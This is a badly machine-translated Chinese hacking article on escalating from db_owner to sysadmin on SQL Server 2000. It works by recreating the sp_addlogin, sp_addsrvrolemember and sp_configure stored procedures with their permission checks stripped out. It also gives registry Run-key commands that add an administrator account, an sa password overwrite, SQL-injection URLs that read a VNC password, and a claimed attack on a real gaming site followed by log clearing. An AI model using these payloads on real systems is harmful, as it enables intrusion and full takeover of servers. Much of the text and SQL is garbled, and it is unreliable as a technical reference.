PS: blog is nothing, I am lazy .. This is the turn of the teacher .. Well, you said, anyway, I have a lot of words ....
Don't ask me here, I don't know, I didn't see !!!
Disclaimer: This article is only used for teaching purposes, and if it is not responsible for the attack consequences of this article. because
It is found that it is too harmful, and the original text has been deleted and modified. Even this paper is still very
Big, so please do not do any destructive operations for the domestic site.
Considering the thirty, even decided to send it. This trick is poisoned, the range is wide, it can be said that as long as it is
Sign with SQL injection vulnerabilities, just use this method 99% to get WebShell or even system authority (not dare
Tell the words, huh, huh, I have hundreds of real "actual exercises", basically 100% can get
Webshell or even system privileges).
I remember that I wrote a kind of "MSSQL DB_OWNER role injecting directly to the system permission (continued)"
Method for obtaining system permissions using XP_REGWRITE: XP_REGWRITE
'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'X
WQ1 ',' REG_SZ ',' NET USER XWQ XWQ / Add '
XP_Regwrite
'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'X
WQ2 ',' REG_SZ ',' Net localgroup administrators xwq / add ', as long as the website is
The server will get system authority. After hundreds of true experiments, this method is not
Too practical, it is easy to attract the attention of the network management, and then DDoS is also a matter of violations (even good people),
Moving a lot of manpower to spend DDOS, material (see how much your broiler is pulling). So not feasible (
Unless you want to get the website you want to get it).
Oh, so much, you may see it is not impatient, good, this introduces me three major
One of the killing skills --- 万 万 提.
If a website exists, there is a SQL injection vulnerability, if this website is used with fixed server sysadmin rights
Limited users' connection (huh, popular point is SA, rookie can think so), huh, huh, want to take
To a WebShell or system authority can be said to be a thing, and it is easy to say, according to what I know,
Sysadmin authority should get 10 kinds of WebShell or system permissions, huh, huh, maybe more (even only
10 kinds), how to get Webshell or system privileges, I don't want to say more, think more than everyone
It's been cooked, but if a website is DB_OWNER permission? What do you do, how do you take a train?
Delivery limit, how to take WebShell (without uploading vulnerabilities and database backups), everyone may return back
Backup a shell, I remember that LCX is also in "MSSQL DB_OWNER Role Injection Direct Access System Permissions"
Said to pull "The shell" Backup "The shell is just the theoretical stuff, if a WebShell has 20MB,
Can you use it? "Oh, if I tell you that DB_OWNER gets a WebShell or the system permission is as much as sysadmin privilege, what is the reflection of you, is it a bit incredible?
Or is it me? (Do not believe in friends, don't look at the content below)
Oh, is it ticking, I can't wait to know, I am not talking, this
Tell everyone about one of my three mustache ---- 万 万 提 权 方法.
Before telling everyone, let's make an experiment first.
Experimental Environment WindowsXP SP1 SQL 2000 SP3, everyone follows me Step to Step, first of all new
User built a permission with db_owner, here I am XWQ (what is in the server role
Don't choose, hook DB_OWNER in the database role), ok, now we open the query analyzer for XWQ
After connecting, enter sp_addlogin xuwenqiang, do it, what to pull?
Server: Message 2571, Level 14, State 2, Process SP_ADDLOGIN, line 16
User 'XWQ' does not run the permissions of DBCC AUDITEVENT.
Server: Message 15247, Level 16, State 1, Process SP_ADDLOGIN, Row 17
The user does not perform the permissions of this.
Oh, the above error message appears is normal, because only sysadmin and securityadmin solid
The member of the server role can execute sp_addlogin, so how can I make sp_addlogin for me?
Use? Let's take a look at sp_addlogin's code:
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int - Return Value of SP Call
- Check permissions -
IF (NOT IS_SRVROLEMEMBER ('SecurityAdmin') = 1)
Begin
DBCC Auditevent (104, 1, 0, @loginame, null, null, @SID)
Raiserror (15247, -1, -1)
Return (1)
end
Else
Begin
DBCC Auditevent (104, 1, 1, @loginame, null, null, @SID)
end
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1) end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginame
IF (@RET <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0)
Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) IS not null)
Begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option -
Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is null
SELECT @Passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_old'begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary
(30), Convert (varchar (30), @passwd))))))
end
Else if @Encryptopt <> Skip_Encryption '
Begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
The reason why only sysadmin and securityadmin fixed server roles can be implemented
SP_ADDLOGIN, mainly here to make a ghost
- Check permissions -
IF (NOT IS_SRVROLEMEMBER ('SecurityAdmin') = 1)
Begin
DBCC Auditevent (104, 1, 0, @loginame, null, null, @SID)
Raiserror (15247, -1, -1)
Return (1)
end
Else
Begin
DBCC Auditevent (104, 1, 1, @loginame, null, null, @SID)
end
As long as we delete this code, users of any permissions can increase user pull.
Ok, let's take sp_addlogin first.
Drop Procedure SP_ADDLOGIN
Then recover sp_addlogin
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int - Return Value of SP Call - Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1)
end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginame
IF (@RET <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0)
Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) IS not null)
Begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option - Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is null
SELECT @Passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_OLD'
Begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary
(30), Convert (varchar (30), @passwd))))))
end
Else if @Encryptopt <> Skip_Encryption '
Begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
So I only increase the user pull, OK, in Query Analyzer
Inside the sp_addlogin xuwenqiang, do it, good! Return to have created a new login.
I created a user Xuwenqiang, of course, I am not white, I have to turn him into
Users with the highest permissions, of course, sysadmin pulling in SQL, and change a user
Sysadmin only sp_addsrvrolemember this stored procedure, but only sysadmin privileges
Users can use it, unhappy, even let him use me, huh, huh, huh, smart readers must think of how to pull me
Let me only have DB_OWNER privilege, how to use sp_addsrvrolemember, yes, and let
SP_ADDLOGIN is the same as the method I have, as long as the SP_ADDSRVROLEMEMBER is limited
For a while, we can add sysadmin pull, let's take a look at the code of sp_addsrvrolemember.
: CREATE Procedure SP_ADDSRVROLEMEMBER
@loginame sysname, - login name
@RoleName sysname = null - Server Role Nameas
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int, - Return Value of SP Call
@Rolebit Smallint,
@isMem Int
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addsrvrolemember')
Return (1)
end
- Validate Server Role Name, Checking Permissions -
SELECT @ismem = is_srvrolemember (@roleName)
IF @ismem is null
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15402, -1, -1, @ropename)
Return (1)
end
IF @ismem = 0
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15247, -1, -1)
Return (1)
end
- Audit A Successful Security CHECK -
DBCC Auditevent (108, 1, 1, @loginame, null, @roleName, NULL)
- Cannot Change Sa Roles -
IF @loginame = 'sa'
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Obtain the bit for this role -
Select @Rolebit = Case @roleName
When 'sysadmin' Ten 16
When 'securityAdmin' Then 32
When 'ServerAdmin' Ten 64
When 'setupadmin' Then 128
When 'processadmin' Then 256
When 'DiskAdmin' Then 512
When 'dbcreator' Then 1024
When 'bulkadmin' Then 4096
Else Null End
- Add row for nt login if needed -
IF not exists (SELECT * from master.dbo.syslogins where
Loginname = @loginame)
Begin
Execute @ret = sp_msaddlogin_implicit_ntlogin @loginame
IF (@RET <> 0)
Begin
Raiserror (15007, -1, -1, @ loginame)
Return (1)
end
end
- Update Role Membership --Update Master.dbo.sysxlogins Set XStatus = XStatus | @Rolebit,
XDATE2 = getdate ()
Where name = @loginame and srvid is Null
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
Raiserror (15488, -1, -1, @ loginame, @ rolename)
- Finalization: Return Success / Failure
Return (@@ Error) - sp_addsrvroleMember
Go
Remove this paragraph - Validate Server Role Name, Checking Permissions -
SELECT @ismem = is_srvrolemember (@roleName)
IF @ismem is null
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15402, -1, -1, @ropename)
Return (1)
end
IF @ismem = 0
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15247, -1, -1)
Return (1)
end
In this way, we can arbitrarily add sysadmin, huh, huh, cool. Enter in the query analyzer
sp_addsrvrolemember Xuwenqiang, sysadmin, yeah !!!!!!!! successfully pulled. Here we are here
Successfully uses users who have only DB_OWNER privileges to create a high-level no-permission in SQL
, That is, user xuwenqiang with sysadmin permissions, with a sysadmin permission wants WebShell or
Is it not easy to system permissions! Don't just put your eyes only on what I said, SP_Addlogin and
SP_ADDSRVROLEMEMBER These two stored procedures, only Sysadmin uses stored procedures
, Use my universal proposal to kill the skills, we can use it. For example: SP-
Configure, sp_addlinkedServer, sp_addlinkedsrvlogin, sp_makewebtask, etc. very
We can make them use me more than SYSADMIN permission.
Let's take an example of a universal proportion
Create a back door that will never be killed and perfect.
We all know that there is a user who is called the back door in SQL, that is, SA, sa is a built-in administrator
Log in and cannot be changed and deleted. Oh, this is M $ saying, if you have seen another one I wrote
Article "Completely deleting SA this back door" knows that in fact, SA is also deleted. We know that in SQL
With the modified memory process, there is sp_password, but we must know the old password for the user to change.
Can change, then there is no way to change the password of the SA without knowing the old password? Yes, in fact
That is, the function of sp_configure, sp_configure is to display or change the global distribution of the current server.
Set. SP_CONFIGURE (Change Configuration Options) is permitted by default awarding sysadmin and serveradmin fixed server roles. This is easy to check the permissions in sp_configure
Segment delete, rebuild, we will use it.
Create Procedure SP_CONFIGURE --- 1996/08/14 09:43
@Configname Varchar (35) = null - Option Name To Configure
, @ configValue int = null - New Configuration Value
AS
Set nocount on
Declare
@Confignum int --Num of the opt to be configured
, @ confount int --num of options like @configname
, @ Show_advance Int --y / N Read & Write Actions ON
Advanced "OPTS
Declare @fullconfigname varchar (35)
Declare @PREVVALUE INT
/ *
** Determine @maxNumber based on advance Option in syscurconfigs.
* /
IF (Select Value from Master.dbo.syscurconfigs Where config = 518) = 1
SELECT @show_advance = 1 - Display Advanced Options
Else
SELECT @show_advance = 0 - DON 'T Display Advanced Options
/ *
** make Certain That Max User Info. Reflects Any AddPak Upgrades.
* /
IF (select high from master.dbo.spt_values where number = 103 and
TYPE = 'c')
<> @@max_connections
Update master.dbo.spt_values
SET high = @@ max_connections
WHERE NUMBER = 103
And type = 'c'
/ *
** if no option name is given, The Procedure Will Just Print Out All ALL
THE
** Options and their values.
* /
IF @configname is null
Begin
Select Name, Minimum = low, maximum = high,
Config_Value = C.Value,
Run_Value = master.dbo.syscurconfigs.value
From master.dbo.spt_values, master.dbo.sysconfigures c,
Master.dbo.syscurconfigs
WHERE TYPE = 'c'
And Number = C.config
And Number = Master.dbo.syscurconfigs.config
and
((C.Status & 2 <> 0 and @show_advance = 1) OR
(C.Status & 2 = 0)
)
Order by Lower (Name)
Return (0)
end
/ *
** Use @Configname and try to find the right option.
** if There isn't Just One, Print Appropriate Diagnostics and return.
* /
Select @configcount = count (*), @fullconfigname = min (v.name),
@PREVVALUE = MIN (C.Value)
From master.dbo.spt_values v, master.dbo.sysconfigures c
WHERE V.NAME LIKE '%' @configname '%' and v.type = 'c'
And v.number = c.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
/ *
** if no option, show the user what the Options is.
* /
IF @configcount = 0
Begin
Raiserror (15123, -1, -1, @ configname)
PRINT ''
Raiserror (15456, -1, -1)
/ *
** Show the user what the Options Are.
* /
Select Name, Minimum = low, maximum = high,
Config_Value = C.Value,
Run_Value = master.dbo.syscurconfigs.value
From master.dbo.spt_values, master.dbo.sysconfigures c,
Master.dbo.syscurconfigs
WHERE TYPE = 'c'
And Number = C.config
And Number = Master.dbo.syscurconfigs.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (1)
end
/ *
** if more Than One option Like @configname, Show the duplicates and
Return.
* /
IF @configcount> 1
Begin
Raiserror (15124, -1, -1, @ configname)
PRINT ''
Select Duplicate_Options = Name
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE Name Like '%' @configname '%'
And type = 'c'
And Number = C.configand
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (1)
end
Else
/ * There Must Be Exactly One, SO Get The Full Name. * /
SELECT @configname = name -, @ value_in_sysconfigure = C.Value
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE Name Like '%' @configname '%' and type = 'c'
And Number = C.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
/ *
** if @configvalue is null, Just Show The Current State of The Option.
* /
IF @ConfigValue is Null
Begin
Select v.name
, v.low as 'minimum'
, v.high as 'maximum'
, C.Value as 'config_value'
, u.value as 'run_value'
From
Master.dbo.spt_values v left outer Join
Master.dbo.sysconfigures c on v.number = c.config
Left outer Join
Master.dbo.syscurconfigs u on v.number = u.config
WHERE
v.type = 'c'
And v.name like '%' @Configname '%'
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (0)
end
/ *
** Now Get The Configuration Number.
* /
SELECT @confignum = Number
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE TYPE = 'c'
And (@configvalue between low and high or @configvalue = 0)
And name Like '%' @configname '%'
And Number = C.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
/ *
** if this is the number of default logage, we want to make sure
** That The New Value IS A Valid Language ID in Syslanguages. * /
IF @confignum = 124
Begin
IF not exists (Select * from master.dbo.syslanguages
Where langid = @ConfigValue)
Begin
/ * 0 Is default language, us_english * /
IF @ConfigValue <> 0
Begin
Raiserror (15127, -1, -1)
Return (1)
end
end
end
/ *
** if this is the number of kernel language, we want to make sure
** That The New Value IS A Valid Language ID in Syslanguages.
* /
IF @confignum = 132
Begin
IF not exists (Select * from master.dbo.syslanguages
Where langid = @ConfigValue)
Begin
/ * 0 Is default language, us_english * /
IF @ConfigValue <> 0
Begin
Raiserror (15028, -1, -1)
Return (1)
end
end
end
/ *
** "User Options" SHOULD NOT TRY TO SET INCOMPATIBLE OPTIONS / VALUES.
* /
IF @confignum = 1534 - "User Options"
Begin
IF (@ConfigValue & (1024 2048) = (1024 2048)) -
ANSI_NULL_DEFAULT_ON / OFF
Begin
Raiserror (15303, -1, -1, @ configValue)
Return (1)
end
end
/ *
** although the @Configname is good, @configvalue wasn't in in.
* /
IF @confignum is null
Begin
Raiserror (15129, -1, -1, @ configvalue, @ configname)
Return (1)
end
- MSG 15002, But in 6.5 Allow this Inside a TXN (Not Check @@ TRANCOUNT)
# 12828.
/ *
** Now Update Sysconfigures.
* /
Update master.dbo.sysconfigure set value = @configvalue
Where config = @Confignum
/ *
** Flush The Procedure Cache - this is to account for options?
Become
** Effective Immediately (IE. Dont NEED A Server Restart).
* /
DBCC FreeProccache
Raiserror (15457, -1, -1, @fullconfigname, @prevvalue, @configvalue) with
log
Return (0) - SP_CONFIGUREGO
OK, we will
sp_configure 'allow updates', 1
Go
Reconfigure with override
Go
It's so good to change the password of the SA. Then Update Sysxlogins Set
Password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50C
BB30267F53B9451B7189CA67AF19A1FC WHERE SID = 0x01, such SA's password is changed
Set of 111111. Oh, the solution to the solution is to delete the sa. How to delete you "
Full delete SA this back door. "
Example:
The following is a good-time attack test for a domestic and very famous site to carry out the top knowledge.
A probably verified, for many factors, etc., we call this site to www. ** 173.com.
Www. ** 173.com This site is very famous on the game, ranking 20 in the top (I was tested at the time)
Here I don't want to say how I found the injection point, you can still find it, or have a lot (whole test
Try really spending a lot of time, don't misunderstand, I don't say time spending on "testing", but all
Write the program in the process, do not write a sample-style program, how can I make me what you want? The whole attack is only 10 points
There is less than a clock.
In the found injection point GameType = ** (depressed, if there is NBSI2 when testing, it is possible
To be relaxed, you can enter Drop Procedure SP_ADDLOGIN first, then enter (huh, you,
Of course, I am in the program I wrote.
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int - Return Value of SP Call
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1)
end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginame
IF (@RET <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0) Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) IS not null)
Begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option -
Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is null
SELECT @Passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_OLD'
Begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary
(30), Convert (varchar (30), @passwd))))))
end
Else if @Encryptopt <> Skip_encryption'begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
OK, we will build an user exec master..sp_addlogin xwq
Drop Procedure SP_ADDSRVROLEMEMBER, then entered in IE
Create Procedure SP_ADDSRVROLEMEMBER
@loginame sysname, - login name
@RoleName Sysname = Null - Server Role Name
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int, - Return Value of SP Call
@Rolebit Smallint,
@isMem Int
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addsrvrolemember')
Return (1)
end
- Cannot Change Sa Roles -
IF @loginame = 'sa'
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Obtain the bit for this role -
Select @Rolebit = Case @roleName
When 'sysadmin' Ten 16
When 'securityAdmin' Then 32
When 'ServerAdmin' Ten 64
When 'setupadmin' Then 128
When 'processadmin' Then 256
When 'DiskAdmin' Then 512
When 'dbcreator' Then 1024
When 'bulkadmin' Then 4096
Else Null End
- add row for nt login if needed - IF not exists (Select * from master.dbo.syslogins where
Loginname = @loginame)
Begin
Execute @ret = sp_msaddlogin_implicit_ntlogin @loginame
IF (@RET <> 0)
Begin
Raiserror (15007, -1, -1, @ loginame)
Return (1)
end
end
- Update Role MEMBERSHIP -
Update master.dbo.sysxlogins set xstatus = xstatus | @Rolebit,
XDATE2 = getdate ()
Where name = @loginame and srvid is Null
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
Raiserror (15488, -1, -1, @ loginame, @ rolename)
- Finalization: Return Success / Failure
Return (@@ Error) - sp_addsrvroleMember
Go
Then exec masser..sp_addsrvrolemember xwq, sysadmin
We take SQL Comprehensive Utilization Tools or Query Analyzers to connect, huh, huh, success, so we are
Www. ** 17173.com servers to build a user with the highest permissions XWQ pull, the following things I think
Everyone should go back. Oh, because it is just a security test, I have not going deeply, and I will delete the account.
To clear the log, flash.
Seeing pulling, one of my killing skills - the power of universal rights, as long as I give me an injection point,
No matter what permissions, I will give you a WebShell or even system privileges. Oh, in fact, the ability to improve
The permissions method is indeed a bit exaggerated, because Create Procedure's permissions awarded Sysadmin
Fixed server role members and DB_OWNER and DB_DDLADMIN fixed database role members, you want
When you meet the permissions of public, it is not good to use.
But don't think it is converted to public permissions, there is no way to get WebShell or system authority, just right
Instead, there are at least five ways to get WebShell or even system privileges according to the user knows that Public permissions.
The best prevention method is to eliminate injection vulnerabilities, this is the solution to the rules and cure. (Oh,
It is me that it is best not to give it, but it is no longer lower than public privileges.
Pull, no way to call public or use a lot of dangerous stored procedures, and public can't
Go, it seems that M is for us "bad people" is still very loved.)
postscript
This article is that I have used the studies in the school since I installed SQL in April 2004, I wrote at the beginning of December.
After that, I have never been released because of the harm too much. I believe that some people know in China. Just not open
Yes. After three considerations, I decided to release it. I hope everyone will master it, don't give domestic sites.
Do any destructive operation.
In this article, I didn't mention how the Public permissions got to get WebShell or system permissions, and the user who knows public permissions at least 5 types of Webshell or even system privileges (even now
Only 5 kinds, there may be more ways, if it is more masters, I hope I can enlighten me, I will thank you first.
Pull)
An appropriate timing, I will dedicate the knowledge I have mastered to everyone to reiterate again. Do not destroy any legal hosts in any country, otherwise the consequences are at your own risk.
---------------------------------------------
Attached to the analysis of the XIAOLU master in the xiaolu exchange group:
-----------------------------------------------
Xiaolu 04:10:48
There is no realization that he said inside.
Xiaolu 04:10:58
Say it is equal to white
Xiaolu 04:11:11
What does he write this article?
(-_- o) 04:11:28
I have also studied it for a long time and I can't achieve it.
The best 7 04:11:38
Calculate a thought
Xiaolu 04:11:58
The storage process is not a great thing.
Xiaolu 04:12:09
Simplify operation
The best 7 04:12:15
Is there a way of thinking about Luo?
Xiaolu 04:12:37
If you don't have the right to use the storage process without the right to save
Xiaolu 04:13:12
Sp_addlogin's most critical sentence is
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
xiaolu 04:13:32
The whole can be simplified
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(NULL, NEWID (), 2, Getdate (),
Getdate (), 'Fengzi', Convert (Varbinary (256), PWDENCRYPT ('123456')),
DB_ID ('Master'), 'US_ENGLISH')
Xiaolu 04:14:12
Sysxlogins This table DB_OWNNER is no right to write
Xiaolu 04:14:16
No authority reading
(-_- o 04:15:02
If it is really not to delete a lot of details
xiaolu 04:17:11
RegWrite DBO can't do it
Xiaolu 04:17:36
Does he say DBO is Master's dbo?
Teacher
Handherapy: MSSQL DB_OWNER role injection directly obtains system authority (mentioned above)
I believe that everyone is already familiar with the ASP MSSQL injection, even a person who does not understand the SQL syntax can also use NBSI to easily invade a large number of websites. But even a SQL INJECTION master, if there is only a DB_OWNER role in MSSQL, it can't guess the background of the website, it seems to be unknown; in addition to getting this idea with backup, I am not online. Find a better invasion. However, the Shell that is backed up is just the theoretical stuff. If a WebShell has 20MB, can you still use it? Not long ago, I met such a Taiwan website. The administrator's password was running out with NBSI, but the username was a pile of garbled in NBSI because it was a traditional reason. I also found the background, you can only have a job. How to do? I swept all the ports and found 5900, and it was estimated that the administrator used VNC to remotely control the server. At this time, I have a thinking that I can crack the VNC to read the encrypted password of the registry. See my performance! The 5900 port of the TELNET server gets the information confirming that the server is VNC.
I believe that everyone will read XP_REGREAD to read the registry, and submit the following statement in turn:
Http://www.something.com/scri ... Eate Table [DBO]. [CYFD] ([GYFD] [CHAR] (255));
In this way, we successfully built a table named CYFD, and added a type of Char and a field name GYFD with a length of 255. Then add data to the table:
_BLANK> http://www.something.com/script.asp?id=2; Declare @Result ... Aster.dbo.xp_regread HKEY_CURRENT_USER, SOFTWARE / ORL / WINVNC3, PASSWORD, @Result Output Insert Into Cyfd (GYFD) VALUES (@Result);
Read the value of the encrypted password of the registry from the registry, and then insert the value into the table just built. Then fetch the VNC encrypted password in the registry:
_BLANK> http://www.something.com/script.asp ... sp; 1 = (Select Count (*) from Cyfd Where Gyfd> 1).
But the result is that I hope that the value of GYFD is empty. If this is easy, there will be no such article. What is this reason? My syntax is incorrect? Touching the check I didn't find mistakes. Is it different in the registry in the registry? Later I started to load VNC in this machine and test the test in the analysis. The result was a number 5. At this time, CZY is online, asked, he advised me to change the GYFD's field into binary data type binary. Try it. So I tested this machine, submit it as follows:
Http://127.0.0.1/script.asp?id=2;create table [dbo]. [cyfd] ([GYFD] [binary] (20));
